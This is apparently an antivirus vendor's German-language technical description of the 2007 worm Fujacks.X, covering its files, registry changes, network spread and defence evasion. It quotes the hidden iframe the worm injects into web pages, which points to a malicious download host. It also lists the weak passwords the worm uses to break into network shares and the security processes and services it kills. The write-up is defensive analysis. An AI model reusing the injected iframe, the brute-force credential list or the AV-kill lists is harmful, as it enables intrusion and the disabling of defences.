Name:Worm/Fujacks.X
Entdeckt am:09/02/2007
Art:Worm
In freier Wildbahn:Ja
Gemeldete Infektionen:Niedrig
Verbreitungspotenzial:Mittel
Schadenspotenzial:Mittel
Statische Datei:Ja
Dateigröße:118.272 Bytes
MD5 Prüfsumme:9d0Ceb2ef643a2f326dfcd8265502ce9
IVDF Version:6.37.01.66 - Freitag, 9. Februar 2007

 General Verbreitungsmethode:
   • Lokales Netzwerk
   • Gemappte Netzlaufwerke


Aliases:
   •  Mcafee: W32/Fujacks.h
   •  Kaspersky: Worm.Win32.Fujack.a
   •  F-Secure: Worm.Win32.Fujack.a
   •  Sophos: W32/Fujacks-AJ
   •  Panda: W32/Radoppan.I.drp
   •  Grisoft: Worm/Generic.ANX
   •  Eset: Win32/Fujacks
   •  Bitdefender: Win32.Worm.Fujacks.X


Betriebsysteme:
   • Windows 95
   • Windows 98
   • Windows 98 SE
   • Windows NT
   • Windows ME
   • Windows 2000
   • Windows XP
   • Windows 2003


Auswirkungen:
   • Terminierung von Sicherheitsprogrammen
   • Lädt Dateien herunter
   • Erstellt Dateien
   • Setzt Sicherheitseinstellungen herunter
   • Änderung an der Registry

 Dateien Kopien seiner selbst werden hier erzeugt:
   • %SYSDIR%\drivers\CTFMONT.exe
   • %Laufwerk%\setup.exe



Bereiche werden Dateien hinzugefügt.
– An: %alle Verzeichnisse%\*.htm Mit folgendem Inhalt:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– An: %alle Verzeichnisse%\*.html Mit folgendem Inhalt:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– An: %alle Verzeichnisse%\*.asp Mit folgendem Inhalt:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– An: %alle Verzeichnisse%\*.php Mit folgendem Inhalt:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– An: %alle Verzeichnisse%\*.jsp Mit folgendem Inhalt:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– An: %alle Verzeichnisse%\*.asp Mit folgendem Inhalt:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe




Es werden folgende Dateien erstellt:

– Nicht virulente Datei:
   • %SYSDIR%\SVKP.sys

%alle Verzeichnisse%\Desktop_.ini Diese Datei ist eine nicht virulente Textdatei mit folgendem Inhalt:
   • %aktuelles Datum%

%Laufwerk%\autorun.inf Diese Datei ist eine nicht virulente Textdatei mit folgendem Inhalt:
   • %Programmcode, der Malware startet%




Es wird versucht folgende Datei herunterzuladen:

– Die URL ist folgende:
   • http://www.ctv163.com/**********/down.txt
Diese Datei enthält wahrscheinlich Download-Adressen welche als weitere Quelle für neue Bedrohungen dienen können.

 Registry Der folgendeRegistryschlüssel wird in einer Endlosschleife fortlaufen hinzugefügt um den Prozess nach einem Neustart des Systems erneut zu starten.

–  [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   • svcshare = %SYSDIR%\drivers\CTMONTv.exe



Die Werte des folgenden Registry keys werden gelöscht:

–  [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   • RavTask
   • KvMonXP
   • kav
   • KAVPersonal50
   • McAfeeUpdaterUI
   • Network Associates Error Reporting Service
   • ShStatEXE
   • YLive.exe
   • yassistse



Folgender Registryschlüssel wird geändert:

Verschiedenste Einstellungen des Explorers:
– [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
   Folder\Hidden\SHOWALL]
   Alter Wert:
   • CheckedValue = %Einstellungen des Benutzers%
   Neuer Wert:
   • CheckedValue = 0

 Infektion über das Netzwerk Um die weitere Verbreitung sicherzustellen versucht sich die Malware mit anderen Computern zu verbinden. Die Einzelheiten hierzu sind im Folgenden beschrieben.


Um sich Zugriff auf entfernte Computer zu verschaffen werden folgende Anmeldeinformationen genutzt:

– Folgende Liste von Benutzernamen:
   • Administrator
   • Guest
   • admin
   • Root

– Folgende Liste von Passwörtern:
   • 1234; password; 6969; harley; 123456; golf; pussy; mustang; 1111;
      shadow; 1313; fish; 5150; 7777; qwerty; baseball; 2112; letmein;
      12345678; 12345; ccc; admin; 5201314; qq520; 123; 1234567; 123456789;
      654321; 54321; 111; 000000; abc; 11111111; 88888888; pass; passwd;
      database; abcd; abc123; sybase; 123qwe; server; computer; 520; super;
      123asd; ihavenopass; godblessyou; enable; 2002; 2003; 2600; alpha;
      110; 111111; 121212; 123123; 1234qwer; 123abc; 007; aaa; patrick; pat;
      administrator; root; sex; god; fuckyou; fuck; test; test123; temp;
      temp123; win; asdf; pwd; qwer; yxcv; zxcv; home; xxx; owner; login;
      Login; pw123; love; mypc; mypc123; admin123; mypass; mypass123; 901100



IP Adressen Erzeugung:
Es werden zufällige IP Adressen generiert wobei die ersten drei Zahlen die der eigenen Addresse sind. Es wird dann versuche eine Verbindung mit diesen Adressen aufzubauen.


Ablauf der Infektion:
Die heruntergeladene Datei wird auf dem enternten computer wie folgt gespeichert: %alle freigegebenen Verzeichnisse%\GameSetup.exe


Reduzierung der Geschwindigkeit:
– Folgende Anzahl von Infektions-Instanzen wird erzeugt: 10
– In Abhängigkeit von Ihrer Bandbreite ist es möglich, dass Sie einen Einbruch der Geschwindigkeit Ihres Netzwerks feststellen. Da die Netzwerkaktivität für diese Malware mittelmäßig ist, besteht auch die Möglichkeit, dass Sie dieses Symptom nicht bemerken, wenn Sie über eine Breitbandanschluß verfügen.
– Es ist möglich, dass der Computer ein wenig an Geschwindigkeit ein büßt. Der Grund hierfür sind vielfachen Netzwer-Instanzen.

 Prozess Beendigung Liste der Prozesse die beendet werden:
   • Mcshield.exe; VsTskMgr.exe; naPrdMgr.exe; UpdaterUI.exe; TBMon.exe;
      scan32.exe; Ravmond.exe; CCenter.exe; RavTask.exe; Rav.exe;
      Ravmon.exe; RavmonD.exe; RavStub.exe; KVXP.kxp; KvMonXP.kxp;
      KVCenter.kxp; KVSrvXP.exe; KRegEx.exe; UIHost.exe; TrojDie.kxp;
      FrogAgent.exe; Logo1_.exe; Logo_1.exe; Rundl132.exe

Prozesse mit einem der folgenden Fensternamen werden beendet:
   • Symantec AntiVirus
   • Duba
   • Windows
   • esteem procs
   • System Safety Monitor
   • Wrapped gift Killer
   • Winsock Expert


Liste der Dienste die beendet werden:
   • sharedaccess; RsCCenter; RsRavMon; RsCCenter; RsRavMon; KVWSC;
      KVSrvXP; KVWSC; KVSrvXP; AVP; kavsvc; McAfeeFramework; McShield;
      McTaskManager; McAfeeFramework; McShield; McTaskManager; navapsvc;
      wscsvc; KPfwSvc; SNDSrvc; ccProxy; ccEvtMgr; ccSetMgr; SPBBCSvc;
      Symantec Core LC; NPFMntor; MskService; FireSvc

 Diverses Anti Debugging
Es wird überprüft ob eine der folgenden Dateien vorhanden ist:
   • \\.\TRW
   • \\.\SICE
   • \\.\NTICE
   • \\.\FILEVXD
   • \\.\FILEMON
   • \\.\REGVXD
   • \\.\REGMON

War dies erfolgreich wird folgendes angezeigt und danach sofort beendet:


 Datei Einzelheiten Programmiersprache:
 Das Malware-Programm wurde in Delphi geschrieben.


Laufzeitpacker:
Um eine Erkennung zu erschweren und die Größe der Datei zu reduzieren wurde sie mit folgendem Laufzeitpacker gepackt:
   • SVKP

Die Beschreibung wurde erstellt von Andrei Gherman am Donnerstag, 18. Oktober 2007
Die Beschreibung wurde geändert von Andrei Gherman am Donnerstag, 18. Oktober 2007

zurück . . . .